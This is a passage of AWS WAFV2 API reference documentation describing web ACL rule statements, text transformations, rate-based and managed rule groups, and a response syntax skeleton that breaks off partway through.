Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
SizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.
If you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.
If you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
ComparisonOperator (string) --The operator to use to compare the request part to the size setting.
Size (integer) --The size, in byte, to compare to the request part, after any transformations.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
GeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.
CountryCodes (list) --An array of two-character country codes, for example, [ "US", "CN" ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.
(string) --
RuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
IPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .
Each IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --The Amazon Resource Name (ARN) of the IPSet that this statement references.
RegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .
Each regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.
FieldToMatch (dict) --The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
RateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.
When the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.
You can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:
An IP match statement with an IP set that specified the address 192.0.2.44.
A string match statement that searches in the User-Agent header for the string BadBot.
In this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.
You cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
Limit (integer) --The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.
AggregateKeyType (string) --Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.
ScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.
AndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .
Statements (list) --The statements to combine with AND logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
OrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .
Statements (list) --The statements to combine with OR logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
NotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .
Statement (dict) --The statement to negate. You can use any statement that can be nested.
ManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
Action (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.
This is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .
You must specify either this Action setting or the rule OverrideAction setting, but not both:
If the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.
If the rule statement references a rule group, use the override action setting and not this action setting.
Block (dict) --Instructs AWS WAF to block the web request.
Allow (dict) --Instructs AWS WAF to allow the web request.
Count (dict) --Instructs AWS WAF to count the web request and allow it.
OverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --Override the rule action setting to count.
None (dict) --Don\'t override the rule action setting.
VisibilityConfig (dict) --Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
VisibilityConfig (dict) --Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
Capacity (integer) --The web ACL capacity units (WCUs) currently being used by this web ACL.
AWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
PreProcessFirewallManagerRuleGroups (list) --The first set of rules for AWS WAF to process in the web ACL. This is defined in an AWS Firewall Manager WAF policy and contains only rule group references. You can\'t alter these. Any rules and rule groups that you define for the web ACL are prioritized after these.
In the Firewall Manager WAF policy, the Firewall Manager administrator can define a set of rule groups to run first in the web ACL and a set of rule groups to run last. Within each set, the administrator prioritizes the rule groups, to determine their relative processing order.
(dict) --A rule group that\'s defined for an AWS Firewall Manager WAF policy.
Name (string) --The name of the rule group. You cannot change the name of a rule group after you create it.
Priority (integer) --If you define more than one rule group in the first or last Firewall Manager rule groups, AWS WAF evaluates each request against the rule groups in order, starting from the lowest priority setting. The priorities don\'t need to be consecutive, but they must all be different.
FirewallManagerStatement (dict) --The processing guidance for an AWS Firewall Manager rule. This is like a regular rule Statement , but it can only contain a rule group reference.
ManagedRuleGroupStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
RuleGroupReferenceStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
OverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --Override the rule action setting to count.
None (dict) --Don\'t override the rule action setting.
VisibilityConfig (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
PostProcessFirewallManagerRuleGroups (list) --The last set of rules for AWS WAF to process in the web ACL. This is defined in an AWS Firewall Manager WAF policy and contains only rule group references. You can\'t alter these. Any rules and rule groups that you define for the web ACL are prioritized before these.
In the Firewall Manager WAF policy, the Firewall Manager administrator can define a set of rule groups to run first in the web ACL and a set of rule groups to run last. Within each set, the administrator prioritizes the rule groups, to determine their relative processing order.
(dict) --A rule group that\'s defined for an AWS Firewall Manager WAF policy.
Name (string) --The name of the rule group. You cannot change the name of a rule group after you create it.
Priority (integer) --If you define more than one rule group in the first or last Firewall Manager rule groups, AWS WAF evaluates each request against the rule groups in order, starting from the lowest priority setting. The priorities don\'t need to be consecutive, but they must all be different.
FirewallManagerStatement (dict) --The processing guidance for an AWS Firewall Manager rule. This is like a regular rule Statement , but it can only contain a rule group reference.
ManagedRuleGroupStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
RuleGroupReferenceStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --The name of the rule to exclude.
OverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --Override the rule action setting to count.
None (dict) --Don\'t override the rule action setting.
VisibilityConfig (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
ManagedByFirewallManager (boolean) --Indicates whether this web ACL is managed by AWS Firewall Manager. If true, then only AWS Firewall Manager can delete the web ACL or any Firewall Manager rule groups in the web ACL.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'WebACL': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'DefaultAction': {
'Block': {},
'Allow': {}
},
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
